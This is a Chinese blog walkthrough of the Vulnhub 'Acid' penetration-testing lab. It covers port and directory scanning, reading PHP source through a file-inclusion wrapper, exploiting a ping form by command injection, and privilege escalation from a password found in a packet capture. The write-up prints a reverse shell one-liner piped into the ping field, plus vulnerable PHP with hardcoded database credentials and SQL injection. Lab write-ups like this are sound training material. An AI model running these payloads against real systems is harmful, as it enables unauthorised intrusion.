当前位置: 首页 > news >正文

Vulnhub 渗透练习(四)—— Acid

news 2025/6/22 21:09:02

环境搭建

环境下载

kail 和 靶机网络适配调成 Nat 模式,实在不行直接把网络适配还原默认值,再重试。

信息收集

主机扫描
在这里插入图片描述
没扫到,那可能端口很靠后,把所有端口全扫一遍。
在这里插入图片描述
发现 33447 端口。

在这里插入图片描述
扫描目录,没什么有用的。
在这里插入图片描述
在首页有个 /Challenge 目录,但是这个目录,dirsearch 和 御剑的字典里没有,赶紧添加一波,或者我们可以换个字典用 kail 的 dirbuster,这个里面的字典就很多。
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在网站的最下边有一串 16 进制的数字,把他们转换为字符串,再 base64 解密一下就可以得到 wow.jpg 密码,再结合扫的目录,/images/wow.jpg
在这里插入图片描述
在这里插入图片描述

把 图片下载下来,用 string是把字符提取出来。

在这里插入图片描述
在最底部可以看到一串数字,字符串就是 7aee0f6d588ed9905ee37f16a7c610d4

在这里插入图片描述
有点像 hash ,解密一下,密码为 63425
在这里插入图片描述

登录

nnd,弄了半天,没成功,在二次爆破一下 /Challenge 目录,因为靶机是我们自己搭的,线程可以调高一点。

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
挨个看一下。

cake.php 提示了个目录,无权访问,难道还要三次爆破?先把其他页面看一下吧。
在这里插入图片描述
include.php
可以用伪协议读取源码。
在这里插入图片描述
cake.php:

<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php'; // 有登录的函数
?><!DOCTYPE html>
<html><head><meta charset="UTF-8"><link rel="stylesheet" href="css/style.css"><link rel="stylesheet" href="styles/main.css" /><title>/Magic_Box</title></head><body><div class="wrapper"><div class="container"><p><h1><font color='Red'>Ah.haan....There is long way to go..dude :-)</h1></font><br><font color='Green'>Please <a href="index.php">login</a></f$</body>
</html>
<?php/* Come on....catch this file "tails.php" */
?>
.à.!¶i

hacked.php

<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php';sec_session_start();if (!isset($_SESSION['protected_page'])){header('Location: protected_page.php');exit;
}
if (!isset($_SESSION['index_page'])){header('Location: protected_page.php');exit;
}
?>
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><link rel="stylesheet" href="css/style.css"><link rel="stylesheet" href="styles/main.css" /><title>Try to Extract Juicy details</title></head><body><div class="wrapper"><div class="container"><?phpif(isset($_REQUEST['add'])){$dbhost = 'localhost';$dbuser = 'root';$dbpass = 'mehak';$conn = mysql_connect($dbhost, $dbuser, $dbpass);if(! $conn ){die('Could not connect: ' . mysql_error());}$id = $_POST['id'];$sql = "SELECT * FROM members WHERE ID = (('$id'))";mysql_select_db('secure_login');$retval = mysql_query( $sql, $conn );if(! $retval ){die('Could not enter data: ' . mysql_error());}echo "You have entered ID successfully...Which is not a big deal :D\n";mysql_close($conn);}?><p> <h1>You are going Good...Show me your Ninja Skills.</h1> <br> <form method="get" action="<?php $_PHP_SELF ?>">Enter your ID:<input name="id" placeholder="id" type="text" id="id" maxlength="20"><input name="add" type="submit" id="add" value="Add ID"></body></html>
.à.!¶i

Magic_Box 爆出几个目录。
在这里插入图片描述
low.php:

<?php
if( isset( $_POST[ 'submit' ] ) ) {$target = $_REQUEST[ 'IP' ];// Determine OS and execute the ping command.if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping  ' . $target );$html .= '<pre>'.$cmd.'</pre>';} else { $cmd = shell_exec( 'ping  -c 3 ' . $target );$html .= '<pre>'.$cmd.'</pre>';echo $cmd;}
}
?>
à“`ñ!¶i

command.php

<?php
include_once '../includes/db_connect.php';
include_once '../includes/functions.php';
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'IP' ];if (stristr(php_uname('s'), 'Windows NT')) { 
$cmd = shell_exec( 'ping  ' . $target );
$html .= '<pre>'.$cmd.'</pre>';
} else { 
$cmd = shell_exec( 'ping  -c 3 ' . $target );
$html .= '<pre>'.$cmd.'</pre>';
echo "$cmd</br>";
}
}
?>
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><link rel="stylesheet" href="../css/style.css"><link rel="stylesheet" href="../styles/main.css" /><title>Reverse Kunfu</title></head><body><div class="wrapper"><div class="container"><p> <h1>You are 1337 Hax0r. Keep your patiene and proceed further.</h1> <br> <form method="post" action="<?php $_PHP_SELF ?>">Enter the Host to Ping:<input name="IP" placeholder="IP ADDRESS" type="text" id="IP" maxlength="200"><input name="submit" type="submit" id="submit" value="submit"></body></html>
à“`ñ!¶i

tails.php 让我们输入 ID,输入之前获得的 63425,成功进入 command.php

可以命令执行,127.0.0.1|ls 直接反弹 shell

127.0.0.1|bash -c "bash -i >& /dev/tcp/192.168.29.129/9999 0>&1"

在这里插入图片描述
在这里插入图片描述
查找 user 的相关文件,发现一个数据包,把它复制到可以访问的目录下,访问下载,用 wireshark 打开。

find / -user acid 2>/dev/null

在这里插入图片描述
在这里插入图片描述

追踪 tcp 流,看到一个疑似密码,试一下
在这里插入图片描述

su saman
sudo su root

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

总结

dirbuster 扫目录
find / -perm -u=s 2>/dev/null 查找可用 suid
find / -user acid 2>/dev/null 查找用户相关文件
http://www.lryc.cn/news/9922.html

相关文章:

  • C++ 在线工具
  • 使用MMDetection进行目标检测、实例和全景分割
  • 使用ThreadLocal实现当前登录信息的存取
  • 高通平台开发系列讲解(Android篇)AudioTrack音频流数据传输
  • BUUCTF-firmware1
  • 【C++之容器篇】二叉搜索树的理论与使用
  • 爬虫神级解析工具之XPath:用法详解及实战
  • Markdown编辑器
  • 数据结构<堆>
  • Linux下Socket编程利用多进程实现一台服务器与多台客户端并发通信
  • 【MySQL】数据库基础
  • Microsoft Office 2021 / 2019 Direct Download Links
  • XX 系统oracle RAC+ADG 数据库高可用容灾演练记录
  • JSP与Servlet
  • C++之迭代器
  • 2023-02-16:干活小计
  • Linux上安装LaTeX
  • webpack -- 无法将“webpack”项识别为 cmdlet
  • 对齐与非对齐访问
  • 基于感知动作循环的层次推理用于视觉问答
  • python中的.nc文件处理 | 05 NetCDF数据的进一步分析
  • GGX发布全新路线图,揭示具备 Layer0 特性且可编程的跨链基建生态
  • taro+vue3 搭建一套框架,适用于微信小程序和H5
  • C++:模板初阶(泛型编程、函数模板、类模板)
  • 把数组排成最小的数 AcWing(JAVA)
  • 4.3 PBR
  • hmac — 加密消息签名和验证
  • AWS攻略——使用ACL限制访问
  • 【已解决】关于 luckysheet 设置纯文本,解决日期格式回显错误的办法
  • Jackson